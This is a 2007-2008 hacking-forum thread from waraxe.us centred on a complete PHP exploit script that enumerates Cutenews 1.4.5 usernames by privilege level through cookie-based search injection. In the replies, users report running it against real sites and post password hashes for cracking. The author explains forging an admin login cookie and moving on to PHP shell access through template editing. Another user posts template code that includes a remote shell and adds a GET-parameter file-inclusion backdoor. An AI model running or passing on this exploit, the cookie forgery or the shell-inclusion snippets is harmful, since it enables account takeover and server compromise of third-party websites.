 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Cutenews <= 1.4.5 usernames fetching exploit |
 |
 Posted: Sun Dec 23, 2007 10:48 pm |
 |
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
 |
|
 |
|
| Code: |
<?php
error_reporting(E_ALL);
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// Cutenews <= 1.4.5 usernames fetching exploit
// Version 1.1
// Written by Janek Vind "waraxe"
// http://www.waraxe.us
// 25. dec 2007
// Estonia, Tartu
//
// FEATURES:
// 1. Fetching algorithm optimized for speed
// 2. Attack goes through $_COOKIE, so no log fear
// 3. Pretesting saves time if Cutenews is not vulnerable
//
// Version 1.1 -> pattern recognize improved
//
// More useful tools: http://www.waraxe.us/tools/
// Waraxe forums: http://www.waraxe.us/forums.html
//
// NB! This exploit is meant to be run as php CLI!
// http://www.php.net/features.commandline
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$target = 'http://localhost/cutenews.1.4.5/search.php';
$level = 1; // User level needed, admin is 1
$outfile = './cute_log.txt';// Log file
//=====================================================================
///////////////////////////////////////////////////////////////////////
// Don't mess below this line, unless you know the stuff ;)
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
if(($level < 1) || ($level > 4))
{
die('Specified level is invalid!');
}
$levels = array(1=>'admin',2=>'editor',3=>'journalist',4=>'commenter');
$levelname = $levels[$level];
$start_time = time();
$users_cnt = array();
$users = array();
$requests = 0;
$cli = php_sapi_name() === 'cli';
//=====================================================================
// Warning, if executed from webserver
//=====================================================================
if(!$cli)
{
if(!isset($_REQUEST['wtf-is-cli']))
{
echo "<html><head><title>Attention!</title></head>\n";
echo "<body><br /><br /><center>\n";
echo "<h1>Warning!</h1>\n";
echo "This exploit is meant to be used as php CLI script!<br />\n";
echo "More information:<br />\n";
echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
echo "Still, you can try to run it from webserver.<br />\n";
echo "Just press the button below and prepare for long waiting<br />\n";
echo "And learn to use php CLI next time, please ...<br />\n";
echo "<form method=\"get\">\n";
echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";
echo "</form>\n";
echo "</center></body></html>\n";
exit;
}
else
{
// Let's try to maximize our chances without CLI
set_time_limit(0);
}
}
//=====================================================================
add_logline("-------------------------------------------------------");
add_logline("Cutenews usernames fetching started");
add_logline("Target: $target");
add_logline("Reglevel: $levelname");
pre_test();
fetch_users();
$fcnt = count($users);
add_logline("Fetched $fcnt usernames with reglevel '$levelname'\n");
xecho("\nFetched $fcnt usernames with reglevel '$levelname'\n", 1);
foreach($users as $username)
{
add_logline($username);
xecho($username, 1);
}
$run_time = time() - $start_time;
xecho("\nTotal time spent: $run_time seconds", 1);
xecho("HTTP requests made: $requests\n", 1);
xecho("Questions and feedback - http://www.waraxe.us/forums.html", 1);
xecho("See ya! :)", 1);
exit;
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
function fetch_users()
{
global $users_cnt, $level;
$maxlen = 15;
$pieces = array(' ' => $users_cnt[$level]);
for($i = 0; $i < $maxlen; $i ++)
{
$cntx = count($pieces);
$arr = array();
foreach($pieces as $known => $count)
{
$arr2 = reveal_next_char($known, $count);
$arr = array_merge($arr, $arr2);
}
$pieces = $arr;
}
}
///////////////////////////////////////////////////////////////////
function reveal_next_char($known, $count)
{
global $users_cnt, $users, $level;
$known = trim($known);
$charset = 'abcdefghijklmnopqrstuvwxyz0123456789._-';
$chars = strlen($charset);
$out = array();
$rl = "[$level]";
$arr = array("$charset" => $count);
$found_final = 0;
while(1)
{
$found = 0;
$arr2 = array();
foreach($arr as $subset => $scnt)
{
$curr_len = intval(floor(strlen($subset) / 2));
// Testing first half
$fhalf = substr($subset, 0, $curr_len);
$un = "^$known([$fhalf])";
xecho("Testing $un");
$matches = make_query($un, $rl);
if($matches > 0)
{
$found += $matches;
xecho("Found $matches match(es)");
if( strlen($fhalf) == 1)
{
// Exact match?
if(test_exact_match("$known$fhalf"))
{
if($matches > 1)
{
$out["$known$fhalf"] = $matches - 1;
}
}
else
{
$out["$known$fhalf"] = $matches;
}
$found_final += $matches;
}
else
{
$arr2[$fhalf] = $matches;
}
}
if($matches < $scnt)
{
// Testing second half
$shalf = substr($subset, $curr_len);
$un = "^$known([$shalf])";
xecho("Testing $un");
$matches = make_query($un, $rl);
if($matches > 0)
{
$found += $matches;
xecho("Found $matches match(es)");
if( strlen($shalf) == 1)
{
if(test_exact_match("$known$shalf"))
{
if($matches > 1)
{
$out["$known$fhalf"] = $matches - 1;
}
}
else
{
$out["$known$shalf"] = $matches;
}
$found_final += $matches;
}
else
{
$arr2[$shalf] = $matches;
}
}
}
}
$arr = $arr2;
if( $found_final >= $count )
{
break;
}
}
return $out;
}
////////////////////////////////////////////////////////////////////////
function test_exact_match($un)
{
global $level;
$rl = "[$level]";
$test = "^$un$";
xecho("Testing for full match $un");
$matches = make_query($test, $rl);
if($matches > 0)
{
xecho("Full username found: $un");
$GLOBALS['users'][]= $un;
return true;
}
xecho("Not full match: $un");
return false;
}
///////////////////////////////////////////////////////////////////////
function pre_test()
{
global $users_cnt;
$un = "^[\.A-z0-9_\-]{1,15}\$";
// Target URL valid?
xecho("Validating target URL");
if(strpos(make_get($GLOBALS['target']), 'search_in_archives') === false)
{
die('Target URL not valid!');
}
xecho("URL is valid");
$rl = "[1-4]";
$cnt_all = make_query($un, $rl);
if($cnt_all < 1)
{
die('Pretest failed - no users at all?');
}
else
{
xecho("Total $cnt_all user(s) detected:", 1);
add_logline("Total $cnt_all user account(s)\n");
}
$rl = "[1]";
$cnt_admins = make_query($un, $rl);
if($cnt_admins < 1)
{
die('Pretest failed - no admins at all?');
}
else
{
xecho("$cnt_admins admin(s)", 1);
add_logline("$cnt_admins admin account(s)");
}
$rl = "[2]";
$cnt_editors = make_query($un, $rl);
xecho("$cnt_editors editor(s)", 1);
add_logline("$cnt_editors editor account(s)");
$rl = "[3]";
$cnt_journalists = make_query($un, $rl);
xecho("$cnt_journalists journalist(s)", 1);
add_logline("$cnt_journalists journalist account(s)");
$rl = "[4]";
$cnt_commenters = make_query($un, $rl);
xecho("$cnt_commenters commenter(s)", 1);
add_logline("$cnt_commenters commenter account(s)\n");
if( $cnt_all === ($cnt_admins + $cnt_editors + $cnt_journalists + $cnt_commenters) )
{
xecho("Pretesting passed successfully - target is vulnerable!", 1);
}
else
{
die('Fetched userscounts does not match - fatal exit!');
}
$users_cnt[1] = $cnt_admins;
$users_cnt[2] = $cnt_editors;
$users_cnt[3] = $cnt_journalists;
$users_cnt[4] = $cnt_commenters;
}
///////////////////////////////////////////////////////////////////////
function make_query($username, $reglevel = '')
{
global $target;
$max_retries = 10;
$cookie = "dosearch=yes;files_arch[]=./data/users.db.php;title=$username";
if(!empty($reglevel))
{
$cookie .= ";user=$reglevel";
}
for($retry = 0; $retry < $max_retries + 1; $retry ++)
{
if($retry > 0)
{
xecho("Request failed!\n");
xecho("Sleeping $retry seconds\n");
sleep($retry);
xecho("Awake ...\n");
xecho("Retry #$retry\n");
}
$buff = make_get($target, $cookie, '', true);
$ret = preg_match('/\[[0-9]{1,6}\]:/',$buff,$hits);
if($ret > 0)
{
$ret = intval(substr($hits[0], 1));
if($ret > -1)
{
return $ret;
}
}
}
die('Fatal error - server down?');
}
///////////////////////////////////////////////////////////////////////
function make_get($url, $cookie = '', $referer = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');
if(!empty($cookie))
{
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
}
if(!empty($referer))
{
curl_setopt($ch, CURLOPT_REFERER, $referer);
}
if($headers === TRUE)
{
curl_setopt($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt($ch, CURLOPT_HEADER, FALSE);
}
$fc = curl_exec($ch);
curl_close($ch);
$GLOBALS['requests'] ++;
return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_logline($line)
{
global $outfile;
$line .= "\n";
$fh = fopen($outfile, 'ab');
fwrite($fh, $line);
fclose($fh);
}
///////////////////////////////////////////////////////////////////////
function xecho($line, $both = 0)
{
if($GLOBALS['cli'])
{
echo "$line\n";
}
elseif($both)
{
$line = nl2br(htmlspecialchars($line));
echo "$line<br />\n";
}
}
//////////////////////////////////////////////////////////////////////
?>
|
Feedback is welcome  |
|
|
|
|
|
|
|
|
| Posted: Sat Jan 19, 2008 8:30 pm |
|
|
| PoisonedV |
| Regular user |
 |
|
| Joined: Jan 19, 2008 |
| Posts: 18 |
|
|
|
|
|
|
|
| Hey, the script is awesome and definately helpful when trying to find out the admin. however when I did a search for level 3 accounts, it went for a little bit then stopped going. any ideas? |
|
|
|
|
| Posted: Sat Jan 19, 2008 8:37 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| PoisonedV wrote: | | Hey, the script is awesome and definately helpful when trying to find out the admin. however when I did a search for level 3 accounts, it went for a little bit then stopped going. any ideas? |
That's odd, script is supposed to work correctly in various conditions ...
Can you provide all output from start to stopping moment - just strip sensitive info before posting it. This should help to figure out the cause of problem ... |
|
|
|
|
|
|
|
|
| Posted: Sat Jan 19, 2008 9:00 pm |
|
|
| PoisonedV |
| Regular user |
|
|
| Joined: Jan 19, 2008 |
| Posts: 18 |
|
|
|
|
|
|
|
Heres the log file. Doesnt reveal much.
-------------------------------------------------------
Cutenews usernames fetching started
Target: http://xxxxx/cutenews/search.php
Reglevel: journalist
Total 12 user account(s)
1 admin account(s)
1 editor account(s)
10 journalist account(s)
0 commenter account(s)
and thats the end of the logfile. In the DOS command window, it started off fine:
but then it started acting weird and stopped
ive tried this multiple times and the same thing happens |
|
|
|
|
| Posted: Sat Jan 19, 2008 9:18 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Hmm, seems like some kind of bug in exploit ... maybe.
Still - you can fetch admin's username and password md5 hash and then log in as admin. With admin privileges all usernames can be seen and manipulated anyway.
I can't fix this bug without testing with real target and right now i don't have much time either. |
|
|
|
|
| Posted: Sat Jan 19, 2008 9:25 pm |
|
|
| PoisonedV |
| Regular user |
|
|
| Joined: Jan 19, 2008 |
| Posts: 18 |
|
|
|
|
|
|
|
| waraxe wrote: | Hmm, seems like some kind of bug in exploit ... maybe.
Still - you can fetch admin's username and password md5 hash and then log in as admin. With admin privileges all usernames can be seen and manipulated anyway.
I can't fix this bug without testing with real target and right now i don't have much time either. |
Yea, its fine. asking around some people to crack the md5 hash or the admin for me, just thought maybe this could speed things up |
|
|
|
|
|
|
|
|
| Posted: Sat Jan 19, 2008 9:45 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| PoisonedV wrote: | | waraxe wrote: | Hmm, seems like some kind of bug in exploit ... maybe.
Still - you can fetch admin's username and password md5 hash and then log in as admin. With admin privileges all usernames can be seen and manipulated anyway.
I can't fix this bug without testing with real target and right now i don't have much time either. |
Yea, its fine. asking around some people to crack the md5 hash or the admin for me, just thought maybe this could speed things up |
You don't need to crack the hash to get admin access to cutenews installation. You just need right cookie with hash - that's all. Cookie forgery - it may be called  |
|
|
|
|
|
|
|
|
| Posted: Sat Jan 19, 2008 10:18 pm |
|
|
| PoisonedV |
| Regular user |
|
|
| Joined: Jan 19, 2008 |
| Posts: 18 |
|
|
|
|
|
|
|
Thanks for that tip. Now I can see all users even without using the script. still want to get that md5 hash cracked though. if you have time, its fad9894adff22d0cb828ce2eb4029ba1 and 04b4fe759be109523596029186c6eb58
but if not its fine |
|
|
|
|
| Posted: Thu Jan 24, 2008 12:05 am |
|
|
| Elewyn |
| Beginner |
|
|
| Joined: Feb 03, 2006 |
| Posts: 3 |
|
|
|
|
|
|
|
| Can explain how to craft a cutenews cookie? |
|
|
|
|
| Posted: Thu Jan 24, 2008 12:11 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Elewyn wrote: | | Can explain how to craft a cutenews cookie? |
Cookie must be like this:
| Code: |
username=admin;md5_password=1b3396f4609f652f7179bd05423c5374;
|
Use Firefox and cookie editor add-on and create new cookie with username and password hash, as seen above, and with domain pointing to target website. That's all
And by the way - when you have cutenews admin privileges, then it's easy to get php level acess - through template editing. And if safe_mode=off, then next step can be exec(), popen(), system() and/or other shell access functions in php
Basically - most of the cutenews-powered websites are just waiting for troubles ... |
|
|
|
|
| Posted: Thu Jan 24, 2008 12:47 am |
|
|
| Elewyn |
| Beginner |
|
|
| Joined: Feb 03, 2006 |
| Posts: 3 |
|
|
|
|
|
|
|
| Sorry i didn't see what you post, ready problem solve |
|
|
|
|
| Posted: Wed Jun 04, 2008 4:40 pm |
|
|
| mixman |
| Regular user |
|
|
| Joined: Jun 03, 2008 |
| Posts: 11 |
| Location: Estonia,Tallinn |
|
|
|
|
|
|
I am trying to fetch admin login name from one site what uses CuteNews 1.4.5 (atleast it sayes so @ bottom of that page)
But when i am trying to get that i got this:
| Quote: | | Fatal errror - server down? |
But server is 100% up
| Quote: | //=====================================================================
$target = 'http://www.*****.org/cutenews/search.php';
$level = 1; // User level needed, admin is 1
$outfile = './cute_log.txt';// Log file
//=====================================================================
|
Anyone can help me out with this?
[[edited by waraxe - no real URL-s!]] |
|
|
|
|
| Posted: Wed Jun 04, 2008 9:12 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| This website is probably patched, so exploit does not work. |
|
|
|
|
| Posted: Thu Jun 05, 2008 7:32 pm |
|
|
| Final |
| Beginner |
|
|
| Joined: Jun 05, 2008 |
| Posts: 3 |
|
|
|
|
|
|
|
Hello, first of all, thank you very much for this exploit and the friendly support. These two scripts worked perfectly for me.
I have a question concerning this, however:
| waraxe wrote: | | And by the way - when you have cutenews admin privileges, then it's easy to get php level acess - through template editing. And if safe_mode=off, then next step can be exec(), popen(), system() and/or other shell access functions in php |
Would you mind to explain how exactly this is possible? I have administrator access to the CuteNews and can create or edit templates. Now I would like to load my own shell up. Is it possible to do this...?
Thanks in advance,
~Final |
|
|
|
|
|
|
|
|
| Posted: Fri Jun 06, 2008 8:27 pm |
|
|
| mixman |
| Regular user |
|
|
| Joined: Jun 03, 2008 |
| Posts: 11 |
| Location: Estonia,Tallinn |
|
|
|
|
|
|
| Final wrote: | Hello, first of all, thank you very much for this exploit and the friendly support. These two scripts worked perfectly for me.
I have a question concerning this, however:
| waraxe wrote: | | And by the way - when you have cutenews admin privileges, then it's easy to get php level acess - through template editing. And if safe_mode=off, then next step can be exec(), popen(), system() and/or other shell access functions in php |
Would you mind to explain how exactly this is possible? I have administrator access to the CuteNews and can create or edit templates. Now I would like to load my own shell up. Is it possible to do this...?
Thanks in advance,
....~Final |
It seems that you can upload shell by insetring this in active template
| Code: | | <?php include('url to your shell here'); ?> |
But dont ask me where does this shell goes, i am trying to figure this out myself also...
Perhaps template file dir???
..../cutenews/data/shell.php
but i guess you cant open file there due permissions 
Edit:
ANother way should be this:
Insert this to active template:
| Code: | | if(isset($_GET['myshell'])) { include($_GET['myshell']); } |
Later go:
| Code: | | http://site.com/cutenews/index.php?myshell=<URL TO SHELL HERE> |
Just some ideas to test, i am very new with this, so better wait for experienced guys opinion... |
|
|
|
|
|
www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 2
Goto page 1, 2Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 110
Members: 0
Total: 110
